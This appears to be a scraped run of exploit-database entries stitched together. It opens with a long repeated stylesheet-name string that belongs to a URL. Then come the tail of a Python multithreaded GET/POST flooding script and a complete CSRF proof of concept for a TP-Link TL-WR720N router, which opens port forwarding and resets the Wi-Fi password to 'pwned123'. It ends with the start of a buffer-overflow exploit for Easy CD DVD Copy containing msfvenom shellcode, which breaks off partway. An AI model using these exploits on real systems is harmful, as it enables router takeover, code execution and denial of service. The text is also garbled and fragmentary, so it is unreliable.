_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,
form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,ui
x_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatis
tic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moder
ator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernSt
atistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,not
ices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login
_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,
form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,ui
x_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatis
tic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moder
ator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code&style=100&dir=LTR&d=1520450366'
# Start args.t GET workers. The threads are started but never joined, and
# daemon is not set, so the process stays alive for as long as they keep looping.
for i in range(args.t):
t = SendGETThread()
t.start()
# POST mode. NOTE(review): indentation is lost in this listing, so the nesting
# of this branch is inferred. `url` is reassigned here, and the GET workers
# re-read the global on every iteration, so with both -u and -p given they
# would switch to the POST URL as well.
if args.p:
url = args.p
for i in range(args.t):
t = SendPOSTThread()
t.start()
# With no arguments neither branch above runs; print the usage text and exit.
if len(sys.argv)==1:
parser.print_help()
exit()
# Script entry point. The sliced argv is passed in, but main() does not use it.
if __name__ == "__main__":
main(sys.argv[1:])
/*
Exploit Title: TL-WR720N 150Mbps Wireless N Router - CSRF
Date: 21-3-2018
Exploit Author: Mans van Someren
Vendor Homepage: https://www.tp-link.com/
Software Link: https://static.tp-link.com/resources/software/TL-WR720N_V1_130719.zip
Version: All versions because it's a 0day
Tested on: Google Chrome - Windows 10
This is only a port-forwarding & change-wifi-password PoC, but every action I found on the router is vulnerable to CSRF
*/
// Candidate router addresses and web-admin ports. The driver loop at the end
// of the script tries every host/port combination because the page cannot
// know which one the victim's router uses.
var ROUTER_HOSTS = ['192.168.0.1', '192.168.1.1'];
var ROUTER_PORTS = ['80', '8080'];
/**
 * Issues a cross-site GET to the router's VirtualServerRpm.htm page by
 * assigning the URL to the src of a detached Image. The response is never
 * read, so the call cannot tell whether the router accepted the request.
 *
 * The URL carries no token or secret. The request therefore only takes effect
 * if the router honours it on the strength of the browser's existing
 * authentication (presumably cached credentials; confirm on the device).
 * The server-side remedy is a per-session anti-CSRF token on every
 * state-changing page, with such changes refused over GET.
 *
 * @param {string} router_host  Address of the router's web interface.
 * @param {string} router_port  Port of the router's web interface.
 * @param {string} host         Value sent as the Ip parameter.
 * @param {string} port         Value sent as the Port parameter.
 */
function portforward(router_host, router_port, host, port) {
    var base = 'http://' + router_host + ':' + router_port;
    var target = base + '/userRpm/VirtualServerRpm.htm?Port=' + port + '&Ip=' + host +
        '&Protocol=1&State=1&Commonport=0&Changed=0&SelIndex=0&Page=1&Save=Save';
    // Setting src on an Image makes the browser fetch the URL as a normal GET.
    var probe = new Image();
    probe.src = target;
}
/**
 * Issues a cross-site GET to the router's WlanSecurityRpm.htm page with
 * `newpass` as the pskSecret value, by assigning the URL to the src of a
 * detached Image. The response is never read.
 *
 * As with the port-forward request, the URL carries no anti-CSRF token.
 * Whether it takes effect depends on the router accepting it from a browser
 * that is already authenticated (presumably; confirm on the device).
 *
 * @param {string} router_host  Address of the router's web interface.
 * @param {string} router_port  Port of the router's web interface.
 * @param {string} newpass      Value sent as the pskSecret parameter.
 */
function change_wifi_pass(router_host, router_port, newpass) {
    var path = '/userRpm/WlanSecurityRpm.htm?vapIdx=1&wepSecOpt=3&keytype=1&keynum=1&key1=&length1=0&key2=&length2=0&key3=&length3=0&key4=&length4=0&wpaSecOpt=3&wpaCipher=1&radiusIp=&radiusPort=1812&radiusSecret=&intervalWpa=86400&secType=3&pskSecOpt=2&pskCipher=3&pskSecret=';
    var tail = '&interval=86400&Save=Save';
    // Setting src on an Image makes the browser fetch the URL as a normal GET.
    var request = new Image();
    request.src = 'http://' + router_host + ':' + router_port + path + newpass + tail;
}
// Runs as soon as the script is loaded: for every host/port pair, send the
// port-forward request and then the Wi-Fi password request. Both calls are
// fire-and-forget; no response is inspected, so the script cannot tell which
// pair, if any, reached a router. The forwarded address/port and the new
// passphrase are hard-coded in the calls below.
for (var i = 0; i < ROUTER_HOSTS.length; i++) {
for (var j = 0; j < ROUTER_PORTS.length; j++) {
portforward(ROUTER_HOSTS[i], ROUTER_PORTS[j], '192.168.0.1', '23');
change_wifi_pass(ROUTER_HOSTS[i], ROUTER_PORTS[j], 'pwned123');
}
}
#!/usr/bin/python
###############################################################################
# Exploit Title : Easy CD DVD Copy v1.3.24 - Local Buffer Overflow (SEH) #
# Exploit Author : Hashim Jawad #
# Twitter : @ihack4falafel #
# Author Website : ihack4falafel[.]com #
# Vendor Homepage : http://www.divxtodvd.net/index.htm #
# Vulnerable Software: http://www.divxtodvd.net/easy_cd_dvd_copy.exe #
# Tested on OS : Windows XP professional SP3 - (996 bytes offset) #
# Windows 7 Enterprise SP1 - (1008 bytes offset) #
# Windows 10 Professional 64bit - (988 bytes offset) #
# Steps to reproduce : #
# ~ Copy the content of OpenMe.txt #
# ~ Click on Register #
# ~ Paste content in "Enter User Name" field #
###############################################################################
import struct
# Builds OpenMe.txt, the string the header says to paste into the
# "Enter User Name" field of the Register dialog.
#
# Payload bytes below come from the msfvenom command recorded on the next line:
# a windows/exec payload that starts calc.exe, encoded to avoid NUL bytes.
# Starting the calculator is only a visible marker that execution was reached.
#root@kali:~# msfvenom -p windows/exec CMD=calc.exe -b "\x00" -f python -v shellcode (220 bytes)
shellcode = ""
shellcode += "\xbf\xc6\xde\x94\x3e\xda\xd0\xd9\x74\x24\xf4\x5d"
shellcode += "\x31\xc9\xb1\x31\x31\x7d\x13\x03\x7d\x13\x83\xc5"
shellcode += "\xc2\x3c\x61\xc2\x22\x42\x8a\x3b\xb2\x23\x02\xde"
shellcode += "\x83\x63\x70\xaa\xb3\x53\xf2\xfe\x3f\x1f\x56\xeb"
shellcode += "\xb4\x6d\x7f\x1c\x7d\xdb\x59\x13\x7e\x70\x99\x32"
shellcode += "\xfc\x8b\xce\x94\x3d\x44\x03\xd4\x7a\xb9\xee\x84"
shellcode += "\xd3\xb5\x5d\x39\x50\x83\x5d\xb2\x2a\x05\xe6\x27"
shellcode += "\xfa\x24\xc7\xf9\x71\x7f\xc7\xf8\x56\x0b\x4e\xe3"
shellcode += "\xbb\x36\x18\x98\x0f\xcc\x9b\x48\x5e\x2d\x37\xb5"
shellcode += "\x6f\xdc\x49\xf1\x57\x3f\x3c\x0b\xa4\xc2\x47\xc8"
shellcode += "\xd7\x18\xcd\xcb\x7f\xea\x75\x30\x7e\x3f\xe3\xb3"
